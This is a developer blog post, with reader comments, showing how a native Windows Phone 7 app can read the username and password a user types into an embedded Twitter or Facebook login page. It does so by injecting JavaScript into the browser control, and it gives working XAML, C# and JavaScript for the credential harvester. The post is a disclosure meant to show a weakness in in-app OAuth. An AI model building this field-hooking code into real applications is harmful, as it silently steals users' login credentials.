Nick's .NET Travels

Continually looking for the yellow brick road so I can catch me a wizard....

Hack: OAuth security flaw for Windows Phone 7, iPhone and other Mobile platforms

If you’ve ever had to work with one of the multitude of social networking sites out there (eg Facebook or Twitter) you’ll be familiar with OAuth (the official documentation is at http://oauth.net/ but most sites have their own documentation too). For integrating these sites into a website, OAuth seems to be relatively secure. There are a couple of versions: OAuth 1, which Twitter currently uses and which is a royal pain to implement, and OAuth 2, which Facebook uses. What I’m going to show in this post is just how dangerous OAuth is for rich client applications (ie native applications for desktop and for most mobile platforms).

The original intent behind OAuth was good and noble. It stems from the lack of trust that users have for websites that prompt for a set of credentials that they don’t manage. For example, if DodgyWebSite43.com asked for your Facebook credentials you wouldn’t enter them, would you? So the idea is to send the user off to Facebook to authenticate; once authenticated, the user is returned to the original website along with a token that indicates they’re authenticated.

For rich client applications (in this example I’ll use a Windows Phone 7 application, but the point I’m making is in no way an issue with the platform; it is an issue with OAuth as a protocol) the idea is that you display a web browser control (UIWebView if you’re in iOS-land) and direct the user to sign into the social network of your choice. Once they’re signed in, the host application can extract the authentication token. Again, the idea is that the application isn’t requesting the user’s credentials. In fact, the application shouldn’t be able to access the user’s credentials at any point in the process.
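
To make the token hand-off concrete, here is a minimal JavaScript sketch of how a host might pull the token out of the URL the browser control ends up on. It assumes an OAuth 2 style redirect that carries the token in the URL fragment as access_token; the function name and the example.com URL are made up for illustration, and the exact redirect format depends on the provider.

```javascript
// Hypothetical helper (not from any provider SDK): extract the token from
// a redirect URL such as
//   https://example.com/callback#access_token=abc123&expires_in=3600
// Assumption: the provider returns the token in the URL fragment.
function extractAccessToken(redirectUrl) {
  var hashIndex = redirectUrl.indexOf('#');
  if (hashIndex === -1) {
    return null; // no fragment, so no token to read
  }
  // Split the fragment into key=value pairs
  var pairs = redirectUrl.substring(hashIndex + 1).split('&');
  for (var i = 0; i < pairs.length; i++) {
    var eq = pairs[i].indexOf('=');
    if (eq === -1) {
      continue; // skip malformed pairs
    }
    var key = decodeURIComponent(pairs[i].substring(0, eq));
    if (key === 'access_token') {
      return decodeURIComponent(pairs[i].substring(eq + 1));
    }
  }
  return null; // fragment present but no access_token in it
}
```

The point to notice is that the token is all the application is supposed to see; nothing in this step needs the username or password.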

This is where things start to go pear-shaped. Nearly every rich client platform that has a web browser control for rendering web content within an application also allows the host application to interact with that content. In most cases this can be used to invoke JavaScript. With some relatively basic manipulation of the HTML DOM you can easily, and I mean easily, extract any data that the user enters.

I’ll step through how I did this in my Windows Phone 7 application:

Step 1: Create the UI – some basic XAML to display a WebBrowser control

<phone:WebBrowser x:Name="Browser"
                     ScriptNotify="Browser_ScriptNotify"
                     IsScriptEnabled="True"
                     LoadCompleted="Browser_LoadCompleted" />
 

Notes: I’ve enabled scripts by setting IsScriptEnabled to true. I’ve attached an event handler to the LoadCompleted event; this will allow me to interact with the DOM once the page has rendered. I’ve also attached a handler to the ScriptNotify event; this will allow me to send data from JavaScript back out to the host application.

Step 2: Navigate to the login screen

void MainPage_Loaded(object sender, RoutedEventArgs e)
{
    // Facebook OAuth login: eg http://www.facebook.com/dialog/oauth/?response_type=token...
    // Twitter login: eg mobile.twitter.com/session/new
    this.Browser.Navigate(new Uri("http://mobile.twitter.com/session/new"));
}
 

[Screenshot: the Twitter sign-in page displayed in the WebBrowser control]

Notes: Running this you’ll see that the browser navigates to the Twitter sign-in page. At this point the user is entering their credentials into the Twitter site. However, what they don’t realise is that the application could be sniffing the data they enter.

Step 3: Inject some JavaScript

private void Browser_LoadCompleted(object sender, System.Windows.Navigation.NavigationEventArgs e)
{
    try
    {
        Browser.InvokeScript("eval", "(function(){" +
            // Find all the input fields
            "var fields = document.getElementsByTagName('input');" +
            // Iterate through looking for text and password fields
            "for(var j=0;j<fields.length;j++){" +
                "if(fields[j].type=='text' || fields[j].type=='password'){ " +
                    // Attach event handlers to retrieve the changed values
                    "fields[j].attachEvent('onchange',function(e){" +
                        "setTimeout('(function(){window.external.notify(\"' + e.srcElement.value + '\");})()',50);" +
                    "});" +
            "}} " +
            "})()");
    }
    catch
    {
        // Swallow any exception thrown while invoking the script
    }
}
 

Notes: This block of code calls the JavaScript eval method, passing in a parameter that defines an entire JavaScript function. eval will interpret and execute that function; this pretty much allows you to run any JavaScript code you want. The comments in the JavaScript should be enough for you to work out what it does up until the setTimeout call.

The window.external.notify JavaScript method is how we send data from JavaScript back out to the host Windows Phone 7 application. When this method is invoked, it raises the ScriptNotify event on the WebBrowser control, passing the method parameter out to the event handler.

You might be asking why we don’t call window.external.notify directly at this point. Unfortunately, if you do that you’ll never see the ScriptNotify event raised. I suspect that this is some sort of conflict occurring on the UI thread: the onchange event is raised in JavaScript due to some UI event from the user (eg moving between fields), and this in turn tries to raise the ScriptNotify event on the UI thread of the browser, which is currently locked. Anyhow, we get around this by delaying the window.external.notify call by 50 milliseconds.
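
Because the injected script is hard to read as a concatenated C# string, here is roughly the same logic written out as plain JavaScript. Treat it as a sketch rather than the code from the application: the function name hookInputFields and its parameters (doc, notify, schedule) are names introduced here so the logic can be run outside a browser. It also passes a function to the timer instead of building a code string, since the string version breaks as soon as the entered value contains a double quote.

```javascript
// Readable sketch of the injected script. hookInputFields, doc, notify and
// schedule are illustrative names, not part of the original application.
function hookInputFields(doc, notify, schedule) {
  // Default to a 50 ms style delay via setTimeout, as in the post
  schedule = schedule || function (fn, ms) { setTimeout(fn, ms); };

  // Find all the input fields
  var fields = doc.getElementsByTagName('input');
  var hooked = 0;

  // Iterate through looking for text and password fields
  for (var j = 0; j < fields.length; j++) {
    var type = fields[j].type;
    if (type === 'text' || type === 'password') {
      // attachEvent and srcElement are the legacy IE event APIs the post uses
      fields[j].attachEvent('onchange', function (e) {
        var value = e.srcElement.value; // capture the value now, send it later
        schedule(function () { notify(value); }, 50);
      });
      hooked++;
    }
  }
  return hooked; // number of fields that now have a handler attached
}

// Inside the page this would be wired up along these lines (assumption):
// hookInputFields(document, function (v) { window.external.notify(v); });
```

Passing notify and schedule in as parameters is only there to make the sketch easy to exercise with stand-in objects; the behaviour the host application sees is the same delayed call to window.external.notify.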

Step 4: User enters username and password

Notes: After each value is entered, the ScriptNotify event is raised, passing out the data entered.

Step 5: Extract the data returned from javascript

private void Browser_ScriptNotify(object sender, NotifyEventArgs e)
{
    // Extract the exported data
    var txt = e.Value;
}
 

Notes: The variable txt holds the exported value from the text or password input field. The application can then do what it likes with those details.

 

When I run this application and enter values, the value of each field I enter text into is exported (see the list of data values below the WebBrowser).

[Screenshot: the WebBrowser control with the list of captured values below it]

I’ve included this as a working example (don’t forget to unblock the file when you download it):

As you can see, it is super easy for a rich client application to effectively steal a user’s credentials whilst they are logging in via a WebBrowser control. The moral of this story is that OAuth should not be used for rich client applications, and that the social networking sites need to mature and offer a secure mechanism for rich client applications to authenticate against their services without those applications accessing the user’s credentials directly.

Comments (3)

  • Dirk de Kok

    3/27/2011 9:20:10 PM

    Yeah, the best and most secure way is to open up a browser window, let the user do the OAuth stuff in there and then afterwards let the browser start up the app again. You can do this on iOS by specifying your own protocol (say myapp://) and using this in the redirect URL.

    It is quite a pain though: app-browser-app is a big round trip, you have to maintain state in your app, and above all it is quite confusing for the end user. HelloInbox uses in-app browser OAuth, and we haven't received any complaints yet.

    A lot of it is trust, not just the technical details.

  • Nick

    3/27/2011 9:44:36 PM

    Yes, most of it does come down to trust. However once some 3rd party applications abuse that trust both users and providers will move against OAuth for rich client apps.

    Unfortunately even your suggestion of opening the browser window is relatively easy to spoof for inexperienced (naive) users. The only solution is actually to prompt the user to open the browser themselves, navigate to the provider website and sign in. Once signed in they should be prompted to permit the 3rd party app. They then close the browser and return to the 3rd party app. Horrible user experience, but it would be relatively secure.

  • Nick

    3/29/2011 7:24:59 PM

    Russ, you make a good point about launching the real web browser in order for the user to authenticate themselves. And this is definitely something I would suggest as a step in the right direction. That said, it's very easy for an application to spoof the web browser, sending the user to what looks like the credential provider's site to sign in. All of the security suggestions you made around SSL can be spoofed very easily to make it look like the native web browser on the platform.

    One way to improve the security would be to have the user launch the browser and navigate to the credential provider's site. When they get there they approve the 3rd party app (they would be prompted by the credential provider to indicate there is an app waiting to be authorised) and then return to the 3rd party app. This removes the ability for the app to spoof the launching of the web browser.

    Unfortunately this scenario sux from a user experience point of view. And unfortunately, due to most consumers being relatively naive, the tradeoff is just not worthwhile. That is, until some major, public accounts are hacked and users start to be more paranoid about these security flaws.
